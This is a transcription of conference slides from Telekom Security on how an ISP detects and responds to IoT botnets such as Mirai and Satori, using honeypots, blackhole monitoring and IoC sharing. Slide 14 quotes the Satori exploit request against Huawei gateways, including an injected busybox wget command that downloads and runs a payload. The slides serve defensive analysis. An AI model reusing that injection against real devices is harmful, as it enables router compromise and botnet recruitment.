Detect & Respond to IoT Botnets AS AN ISP. Christoph Giese Telekom Security; Cyber DefenSe Center

Transcription

1 Detect & Respond to IoT Botnets AS AN ISP Christoph Giese Telekom Security; Cyber DefenSe Center

2 Management Summary Mirai hit us hard; IoT Botnets are on the rise and rapidly evolving We developed a three-stage model to handle this threat and proved it s value on a real-world example Work in progress; continuously improvement needed 2

3 History / Threat description The evolution of IoT botnets

4 IOT botnets on the rise Mirai Surface DDoS against OVH/Krebs Volume > 1Tbps 8 billion IoT devices* IoT Reaper Mirai source code released (Multiple clusters rising) Compromise attempt on DTAG CPEs DTAG attacker arrested Satori JenX offers 200 Gbit/s DDoS for $20 FBI took over 500k Botnet. Destructive MW 20 billion IoT devices* k routers acting as (APT) proxy exploiting UPNP You are here, having fun looking forward 2019/2020 [USENIX]; *[Gartner] 4

5 IOT botnets Rapidly evolving VPNFilter Mirai v1 1) Tries 64 user/password combinations on random IPs on port 23 2 years 2) Pre-Defined DDoS modules 3) Waiting for an IP to kill First Worm Modern malware 30y In IoT 2 years [APNIC] Graphic by [Talos] 5

6 Our three level approach Applying security best-practices on a new threat

7 We developed a three-stage model for handle Iot Botnets as ISP DETECT ANALYZE RESPOND Blackhole Monitoring Sandboxing / Reversing Payload Monitor / Block IoCs on network borders Honeypot Monitoring Customer Premises Equipment (CPE) Monitoring Anomaly Detection (Alarming) Tracking activities (DNS, pdns, Peakflow) Correlation to seen attacks Processes & Sharing Rollout of mitigations to CPE Report affected IPs to customers Inspired by the good old OODA loop (Thanks for breaking my browser with your 200+ slide 7

8 Heavily increased detection capabilities Blackhole Monitoring Monitor unused IP address ranges Fastest alerting capabilities D [Detect] A R Set of anomaly detections (Std. Deviations/Single SYN/ ) Honeypot Monitoring Worldwide honeypot network In-depth view about attacker behavior (shell history; dropped files/samples) CPE Monitoring Availability (e.g. registration rates vs baseline) Independent sensors for best coverage; Centralized monitoring for correlations Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 8

9 Analyze phase to enrich information for response Sandboxing/Reversing Analyze honeypot payload to identify IoCs Tracking Activities D A [Analyze] R pdns: First seen in Germany? (All customers DNS) pdns: FastFlux? Multiple domains? Important Peakflow: Increasing activity from customer routers? Correlation to seen attacks MISP correlations using tons of public/private feeds CTI analysts classification to seen attacks (under construction) Invest in the best sources Understand the threat Enrich information to respond Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 9

10 AS an ISP we established multiple response capabilities Protection at network borders Filtering on TCP/IP layer Sinkhole C2 domains (roadmap; german law) D A R [Respond] Rollout of mitigations to the CPE With suppliers If applicable and necessary Report affected IPs to customers Inform infected customers via postal letter ISP exchange via centralized MISP for fully-automated information exchange (under construction) Apply mitigations to protect our customers Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 10

11 Real-world examples Applying our model on the satori case

12 The blackhole sensor detected huge spike Blackhole Sensor D [Detect] A R Tolerance threshold exceeded in standard deviation :02 (UTC) Alarming in SoC: We have a large traffic spike on port TCP Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 12

13 Analyze Spike Find starting point for investigation Traffic Analysis >75k unique source IP addresses Devices are routers from North-Africa / South-America (Tunisia/Egypt) No IP addresses from our network No 3 rd level escalation over night required D A [Analyze] R IoCs IP TTL < 64 TCP Window Size: Packet length=74 Bytes Are we affected? SPEED! Determined escalation level 13

14 Sandboxing and reversing revealed IoCs Enrich detected anomaly with IoCs Sandboxing/Reversing 1. Find payload in the honeypot network 2. Analyze payload using reverse engineering 3. Share information to track malware IoCs: POST /ctrlt/deviceupgrade_1 HTTP/1.1 Host: :37215 Authorization: Digest username="dslfconfig", realm="huaweihomegateway" D A [Analyze] <NewStatusURL>$(/bin/busybox wget -g l /tmp/.f -r /b; sh /tmp/.f)</newstatusurl> <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL> Understood vulnerability Collected additional IoCs R 14

15 Respond based on impact Protection on network borders Continuous monitoring of IoCs started 24/7 team briefed D A R [Respond] Rollout of mitigations to the endpoint CPE department confirmed: Vulnerable SW not in use Vulnerable webserver not in use in home automation devices Report affected IPs to customers Internal: Not needed; External: Roadmap Apply mitigations to protect customers 15

16 Summary & Outlook DETECT Blackhole Monitoring ANALYZE Sandboxing / Reversing Payload RESPOND Monitor / Block IoCs on network borders Honeypot Monitoring Customer Premises Equipment (CPE) Monitoring Anomaly Detection (Alarming) Tracking activities (DNS, pdns, Peakflow) Correlation to seen attacks Processes & Sharing Rollout of mitigations to CPE Report affected IPs to owners 16

17 Thanks! Questions? Christoph Giese t-systems Cyber DefenSe Center

18 DISCussion - How do you handle news on vulnerabilities in IoT devices as a [manufactor, customer, ISP]? - Are you [as a CERT/CDC/SoC] interested in malicious source IP addresses from infected devices? - How should we as a security community be prepared for more and more complex IoT botnets? 18

19 Sources [Antonakakis2017] [APNIC] [Cloudflare] [Gartner] [Talos] [Wired] Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 19

20 Backup

21 Who WE ARE Goal: Protect company and their customers Cyber Defense Center & CERT SoC/s Monitoring/Feedback 24/7 Alarming Sensor Experts Continuous Improvement of capabilities FRAUD Design/Build rules for the detection mechanisms in 24/7 SoC Incident Coordination Information sharing Cyber Threat Intel Abuse [ ] Research MW Analysis Inform customers / track status 21

22 Who AM I Cyber Defense Center & CERT Design/Build rules for the detection mechanisms in 24/7 SoC Incident Coordination Information sharing Christoph Giese Work / Studies Automotive (Software Engineer; 2y) CDC/CERT (Forensics/ 3 rd level SoC / Tech CTI / SW Dev / Sec Platform; 3.5y) Msc Digital Forensics (Topic: IoC vetting; on-the-job) Open Source supporter / Music / Sports / Discussions 22

23 Threat Description Attackers view Advantages of IoT devices + 24/7 online + (Mostly) unmonitored + Poorly secured + Increasing market + Increasing computing power + Max distributed Category Consumer 5, , ,863.0 Business: Cross- Industry Business: Vertical- Specific 1, , , , , ,171.0 Grand Total 8, , ,415.4 [Gartner] Detect & Respond to IoT Botnets as an ISP Christoph Giese; Telekom Security 23

24 Rapid evolution of IOT botnets JenX 4 Mirai Copy Cats 2 IoT Reaper Rep: Advanced Flexible LUA engine 3 Rep: Advanced Not relying on infected device Mirai v1 Rep: Trivial 64 default user-pwcombinations 1 Rep: Easy Code leak paved the way to new variants Detect: Easy Still Noisy, but multiple clusters* Detect: Advanced Code updates on-thefly Rep technique not discloses assigned botnet on its own Detect: Challenge Size not easy countable Detect: Trivial Noisy & Low Tech Rep=Replication * [antonakakis2017] 24

25 Our Model for handling Iot Botnets as ISP Tracking Activities pdns: (First) seen in Germany? pdns: FastFlux? Multiple domains? Important Simple IP communication Peakflow: Increasing activity from customer routers? No anomalies D A [Analyze] CTI-Analysts classification to seen attacks Based on Mirai source code R Correlation to seen attacks MISP correlations using tons of public/private feeds First information incoming Extended timeline information Investigated additional communication channels 25

26 IntelMQ Message Bus System Collector Parser Expert Output Collector Parser Expert Expert Output Expert Output 26

27 Vetting of Indicators